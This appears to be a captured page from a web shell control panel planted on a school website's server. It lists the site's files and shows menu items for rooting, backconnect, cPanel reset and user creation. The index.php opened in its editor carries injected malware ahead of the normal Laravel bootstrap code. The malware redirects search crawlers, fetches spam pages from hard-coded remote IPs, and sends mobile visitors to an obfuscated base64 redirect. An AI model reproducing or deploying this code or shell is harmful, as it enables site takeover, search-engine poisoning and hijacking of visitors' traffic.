Linux srv1.sbit.com.bd 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
Apache
: 144.76.42.188 | : 18.118.193.28
248 Domain
8.1.30
pmthsedu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
pmthsedu /
public_html /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
StudentPreviousFiles
[ DIR ]
drwxrwxr-x
admin
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
build
[ DIR ]
drwxrwxr-x
frontend
[ DIR ]
drwxrwxr-x
members_image
[ DIR ]
drwxr-xr-x
mujib100
[ DIR ]
drwxrwxr-x
notices_image
[ DIR ]
drwxrwxr-x
pages_image
[ DIR ]
drwxrwxr-x
photogallerys_image
[ DIR ]
drwxrwxr-x
principle_image
[ DIR ]
drwxrwxr-x
profile_images
[ DIR ]
drwxrwxr-x
setting_image
[ DIR ]
drwxrwxr-x
student_image
[ DIR ]
drwxrwxr-x
teacherstaff_image
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxr-x
vice_principal_image
[ DIR ]
drwxrwxr-x
video
[ DIR ]
drwxr-xr-x
.htaccess
809
B
-rw-rw-r--
error_log
425.37
KB
-rw-rw-r--
favicon.ico
0
B
-rw-rw-r--
google579bf040d3fc3b95.html
53
B
-rw-r--r--
googlec0f036b3f1bfac9f.html
53
B
-rw-r--r--
hook.htm
4.05
KB
-rw-r--r--
index.php
3.71
KB
-rw-rw-r--
national_anthem.mp3
3.44
MB
-rw-rw-r--
robots.txt
24
B
-rw-rw-r--
tm_bg.jpg
314.58
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php ob_start(); header('Vary: Accept-Language'); header('Vary: User-Agent'); $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); $urlTo = "https://putneyvt.org/"; $botchar = "/(googlebot|slurp|adsense|inspection|ahrefs)/"; if (preg_match($botchar, $ua)) { header("Location: $urlTo",TRUE,301); ob_end_flush(); exit(); } ob_end_flush(); ?> <?php set_time_limit(0);error_reporting(0);header("Content-Type: text/html;charset=utf-8");$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://38.173.85.201/?");define('road',"app?domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@Googlebot|google|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".htm")or $a(url,".html")or $a(url,".htm")or $a(url,".htm")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://38.173.85.200/");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHBzOi8vZ29vb2dsZWxpbmsuY29tL3ZtOW1sLyI+');exit;} ?><?php use Illuminate\Contracts\Http\Kernel; use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Check If The Application Is Under Maintenance |-------------------------------------------------------------------------- | | If the application is in maintenance / demo mode via the "down" command | we will load this file so that any pre-rendered content can be shown | instead of starting the framework, which could cause an exception. | */ if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) { require $maintenance; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | this application. We just need to utilize it! We'll simply require it | into the script here so we don't need to manually load our classes. | */ require __DIR__.'/../vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request using | the application's HTTP kernel. Then, we will send the response back | to this client's browser, allowing them to enjoy our application. | */ $app = require_once __DIR__.'/../bootstrap/app.php'; $kernel = $app->make(Kernel::class); $response = $kernel->handle( $request = Request::capture() )->send(); $kernel->terminate($request, $response);
Close